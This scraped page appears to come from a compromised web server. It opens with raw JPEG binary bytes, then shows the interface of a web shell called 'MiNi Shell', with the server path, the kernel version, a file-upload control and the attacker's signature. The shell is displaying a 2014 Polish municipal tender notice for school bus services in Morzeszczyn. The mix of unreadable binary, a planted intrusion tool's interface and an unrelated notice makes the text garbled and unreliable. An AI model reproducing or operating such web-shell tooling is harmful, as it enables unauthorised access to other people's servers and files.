JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140527/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140527/177814-N-2014.html

<p class="kh_header"><b>Morzeszczyn: DOWÓZ   UCZNIÓW DO  PLACÓWEK OŚWIATOWYCH NA TERENIE GMINY MORZESZCZYN NA PODSTAWIE ZAKUPU BILETÓW MIESIĘCZNYCH W ROKU DYDAKTYCZNO - WYCHOWAWCZYM 
2014-2015 i 2015-2016</b><br>
<b>Numer ogłoszenia: 177814 - 2014; data zamieszczenia: 27.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Morzeszczyn , ul. 22 Lipca 4, 83-132 Morzeszczyn, woj. pomorskie, tel. 058 5362724 w. 14, faks 058 5362792.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.morzeszczyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOWÓZ   UCZNIÓW DO  PLACÓWEK OŚWIATOWYCH NA TERENIE GMINY MORZESZCZYN NA PODSTAWIE ZAKUPU BILETÓW MIESIĘCZNYCH W ROKU DYDAKTYCZNO - WYCHOWAWCZYM 
2014-2015 i 2015-2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres rzeczowy Przedmiotu zamówienia obejmuje   :
            1) przewóz dzieci (dowóz do szkół i odwiezienie do miejsca zamieszkania) w okresie trwania zajęć 
                dydaktyczno-wychowawczych w roku  2014-2015 i 2015-2016 (w okresie od 01.09.- 30.06. ) w dni nauki 
                przyjmując organizację roku szkolnego zgodnie z Rozporządzeniem Ministra Edukacji Narodowej i  
                Sportu  z dnia 18 kwietnia 2002 roku w sprawie organizacji roku szkolnego (Dz.U. z 2002 r. Nr 46, poz.  
                432 z późn.zm.)  oraz na zawody sportowe ,  konkursy, warsztaty i inne imprezy organizowane  dla Szkół 
                Podstawowych i Gimnazjum na terenie Gminy Morzeszczyn
            2) transport - dowóz uczniów   będzie się odbywał na terenie Gminy Morzeszczyn na trasach i w godzinach  
                 uzgodnionych z Zamawiającym ( rozpoczęcie dowozów ok. godz. 6:30, zakończenie ok. godz. 15:30) i  
                 będzie obejmował dowóz :
                 -   58 uczniów do Szkoły Podstawowej w Nowej Cerkwi
                 - 317 uczniów do Zespołu Szkół w Morzeszczynie
            3) Zamawiający zastrzega sobie możliwość wprowadzenia na określone dni innego niż ustalony rozkładu  
                 jazdy po wcześniejszym powiadomieniu Wykonawcy

            4) Zamawiający wymaga , aby Wykonawca dysponował   2 autobusami z liczbą miejsc siedzących 
                nie mniej niż 42 każdy zapewniających dowóz wszystkich uczniów na poszczególnych 
                trasach w  wyznaczonych godzinach oraz 1 autobusem rezerwowym .
                Ilość   kilometrów do przejechania tygodniowo dla poszczególnych autobusów wynosi :
                -  autobus nr 1  ok. 1000 km / tygodniowo
                -  autobus nr 2  ok.   830 km / tygodniowo
            5) Wykonawca na każdy miesiąc kalendarzowy wyda bilety dla uczniów uprawnionych do przejazdu wg  
                 wykazu sporządzonego przez zamawiającego i zatwierdzonego przez Dyrektorów poszczególnych  
                placówek oświatowych do 20 każdego miesiąca . Zamawiający najpóźniej do 25 każdego miesiąca w roku  
                szkolnym przekaże Wykonawcy zapotrzebowanie na zakup biletów.
            6) ceny biletów winny uwzględniać uprawnienia dzieci do zniżek i ulg wynikających ze stosownych  
                przepisów
            7) miesięczne bilety zostaną wydane zamawiającemu w siedzibie Wykonawcy w terminie do 28 każdego  
                 miesiąca w roku szkolnym ( w miesiącu lutym do 26 na miesiąc marzec) 
            8) ilość kupowanych biletów miesięcznych w okresie roku dydaktyczno- wychowawczego może ulegać  
                zmianie , z tym że granice zmian nie mogą przekroczyć +-  10% wartości ryczałtowej brutto za   
               przedmiot zamówienia. W przypadku zwiększenia ilości dowożonych uczniów Wykonawca  
               musi zapewnić ich dowóz na warunkach podanych w ofercie. 
                Z tytułu zmniejszenia ilości dowożonych uczniów zamawiający nie przewiduje ponoszenia  
               dodatkowych opłat z tego tytułu.
            9) rozliczenia będą dokonywane w cyklu miesięcznym, na podstawie zestawienia faktycznie  
                zakupionych biletów miesięcznych
          10) szacunkowa liczba uczniów wynosi ok. 375 . Ceny biletów będą się różniły w zależności od 
                odległości jaka dzieli dzieci od placówki oświatowej tj. 
                - I grupa biletów   dla uczniów, których odległość od szkoły wynosi   do  4 km         -  118
                - II grupa biletów dla uczniów, których odległość od szkoły wynosi od  4 do 8 km    -  214
                - III grupa biletów dla uczniów, których odległość od szkoły wynosi powyżej 8 km  -    43
          11) Zamawiający zastrzega sobie możliwe odstępstwa od podanego haromonogramu przewozów  
                uzależnione od zmiany planów lekcji, ilości dzieci, zmian organizacyjnych dot. roku szkolnego,  
                odpracowania dni wolnych itp.
          12) Zamawiający zapewni opiekę nad dziećmi przewożonymi autobusami Wykonawcy  
           13) pojazdy zadysponowane do przewozów muszą odpowiadać ogólnym warunkom przewozu  
                 osób, muszą posiadać ważne polisy ubezpieczeniowe OC i NW oraz aktualne pozytywne  
                 badania techniczne.
            14) Wykonawca musi dysponować ilością kierowców odpowiednią do realizacji zamówienia (co najmniej 3 
                   kierowców) , przy czym kierowcy muszą posiadać stosowne uprawnienia tj. ważne prawa jazdy 
                   kategorii D, ważne świadectwo kwalifikacji lub zaświadczenie o ukończeniu kursu dokształcającego 
                   kierowców przewożących osoby. 
             15) przewozy muszą być dokonywane środkami transportu spełniającymi wymagania techniczne określone 
                   w przepisach ustawy prawo o ruchu drogowym  i innych przepisach związanych z przewozem osób.
             16) Zamawiający wyraża zgodę na postój autobusów na placu przy Zespole Szkół w Morzeszczynie.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże że posiada ważną  
              licencję/zezwolenie na wykonywanie krajowego transportu drogowego osób autobusem 
              na podstawie ustawy z dnia 6 września 2001 r. o transporcie drogowym . 
              Ocena spełnienia  powyższego warunku zostanie dokonana na podstawie złożonej oferty wg.  
              formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że posiada wiedzę i  
              doświadczenie, a w szczególności , że  w okresie ostatnich trzech lat przed upływem terminu  
              składania ofert  albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli  okres  
              prowadzenia działalności jest krótszy - w tym okresie, wykonał  co najmniej  2 usługi  
              transportowe dot. przewozu osób odpowiadające zakresowi przedmiotu zamówienia  . 
              Wykazane przez Wykonawcę usługi muszą być wykonane lub są wykonywane z należytą  
              starannością.
              Ocena spełnienia powyższego warunku zostanie dokonana na podstawie złożonej oferty wg.  
              formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca  wykaże, że dysponuje  
               odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub  
               przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału 
               technicznego                     
                                do wykonania zamówienia tj.  2  
              autobusami podstawowymi + 1 autobus rezerwowy o liczbie miejsc siedzących niemniej niż 42 .  
              Ocena spełnienia powyższego warunku zostanie dokonana na podstawie złożonej oferty wg.  
               formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony , jeżeli Wykonawca wykaże, że dysponuje odpowiednim potencjałem osobowym zdolnym do wykonania zamówienia lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia potencjału osób zdolnych do wykonania zamówienia ,w tym 2 osób które będą 
               uczestniczyć w wykonywaniu zamówienia, posiadających uprawnienia do kierowania  
              autobusami (prawo jazdy kat. D, świadectwo kwalifikacji lub zaświadczenie) i  
              doświadczenie (min. 5 lat pracy na stanowisku kierowcy autobusu) oraz   2  
              autobusami podstawowymi + 1 autobus rezerwowy o liczbie miejsc siedzących niemniej niż 42 .  
              Ocena spełnienia powyższego warunku zostanie dokonana na podstawie złożonej oferty wg.  
               formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowo sposobu spełnienia tego warunku .
        Zamawiający uzna w/w warunek za spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie  prowadzonej działalności w wysokości, co najmniej  100.000,00 zł. 
               Ocena spełnienia powyższego warunku zostanie dokonana na podstawie złożonej oferty wg.  
               formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. VII ppkt 7.3 i 7.4 SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, 
b)	Dokument, o którym mowa w pkt. VII ppkt. 7.3   powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
c)	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. VII SIWZ, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis powołany w lit. b) SIWZ stosuje się odpowiednio.
d)	W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
e)	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art. 144 ustawy - Prawo zamówień publicznych Zamawiający przewiduje możliwość dokonania     
     istotnych zmian zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru   
     Wykonawcy. Zamawiający   przewiduje możliwość zmiany postanowień zawartej umowy  w stosunku do treści    
      oferty w określonych warunkach możliwości dokonania zmian :
   - zmiana regulacji prawnych w stosunku do powszechnie obowiązujących przepisów prawa (np. zmiana stawki   
     podatku VAT)
  - konieczności zmiany terminu realizacji
  - działaniem siły wyższej w rozumieniu przepisów k.c. w związku z powstaniem okoliczności wynikających z    
     przyczyn niezależnych od Zamawiającego  tj. technicznych , gospodarczych i finansowych
 -  z przyczyn których wcześniej nie można było przewidzieć a wykonanie  umowy  
    nie leży w  interesie publicznym umowy,  Zamawiający    
         może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach tj.
     -  jeżeli zostanie ogłoszona upadłość lub rozwiązanie firmy Wykonawcy,
     -  jeżeli zostanie wydany nakaz zajęcia majątku Wykonawcy,
     -  jeżeli Wykonawca nie rozpoczął przewozów do którejkolwiek szkoły bez uzasadnionych przyczyn     
         oraz nie kontynuuje ich pomimo wezwania Zamawiającego złożonego na piśmie,
    -  jeżeli Wykonawca przerwał przewozy z przyczyn niezależnych od Zamawiającego na okres dłuższy  
          niż dwa dni do którejkolwiek szkoły na terenie gminy
    -   w wypadku stwierdzenie przez Zamawiającego, że samochody   podstawione do przewozu  
          uczniów, bądź też kierowcy upoważnieni do ich obsługi powodują zagrożenie dla zdrowia   
          przewożonych uczniów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.morzeszczyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Morzeszczyn
ul. 22 Lipca 4
83-132 Morzeszczyn
pok. nr 13.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2014 godzina 12:00, miejsce: Urząd Gminy Morzeszczyn
ul. 22 Lipca 4
83-132 Morzeszczyn
pok. nr 10 Sekretariat UG.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com